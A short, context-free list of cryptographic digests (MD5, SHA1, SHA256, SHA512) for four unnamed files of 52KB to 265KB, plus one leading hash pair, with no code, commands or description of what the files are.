SHA256: e6c93305d886bff678bd83b715bb5c5cbb376b90b973d9dd6844fac808de5c82
SHA512: d5d32b894a485447d55499a2f1e02a8b33fb74081f225b8e2872995491a37353cf8022f46feeb3ca363b2e172ab89e29ab9a453692d1a964ca08d40230574bf6

Filesize: 52KB
MD5: c9d74156913061be6c51d8fc3acf8e93
SHA1: 4a4c6473a478256e4c78b423e918191118e01093
SHA256: af0a38b4e95a50427b215eebc185bb621187e066b8b7373fb960eac0551bec37
SHA512: c12f75a6451881878a7a9ed5de61d157ea36f53aa41abf7660e1cc411b2ddd70ff048a307b1440cfdf1b269aeff77da8cc163ad19e9e3a294a5128f170f37047

Filesize: 104KB
MD5: 62de64dc805fd98af3ada9d93209f6a9
SHA1: 392ba504973d626aaf5c5b41b184670c58ec65a7
SHA256: 83c0f61cc8fc01c789c07dd25f58862e0710088e6887716b1be9ee9f149adefc
SHA512: 7db48f240df566be9a4b836807f97e8169d58edfa699de69be35b3977e442da3fea4f8b38d359d50f4d5afcf8547c8f66329e5ec855efbc5402ce88458d67e28

Filesize: 124KB
MD5: e7caed467f80b29f4e63ba493614dbb1
SHA1: 65a159bcdb68c7514e4f5b65413678c673d2d0c9
SHA256: 2c325e2647eb622983948cc26c509c832e1094639bb7af0fb712583947ad019c
SHA512: 34952d8a619eb46d8b7ec6463e1e99f1c641ce61c471997dd959911ae21d64e688d9aa8a78405faa49a652675caf40d8e9e5a07de30257f26da4c65f04e2181e

Filesize: 265KB
MD5: 7b38d7916a7cd058c16a0a6ca5077901
SHA1: f79d955a6eac2f0368c79f7ba8061e9c58ba99b2
SHA256: 3f6dd990e2da5d3bd6d65a72cbfb0fe79eb30b118a8ad71b6c9bb5581a622dce
SHA512: 2d22fe535f464f635d42e5b016741b9caf173da372e4563a565fa1e294581f44330c61e08edfe4c08a341ebd708e2ad08614161c0ee54e8dea99452b87d1e710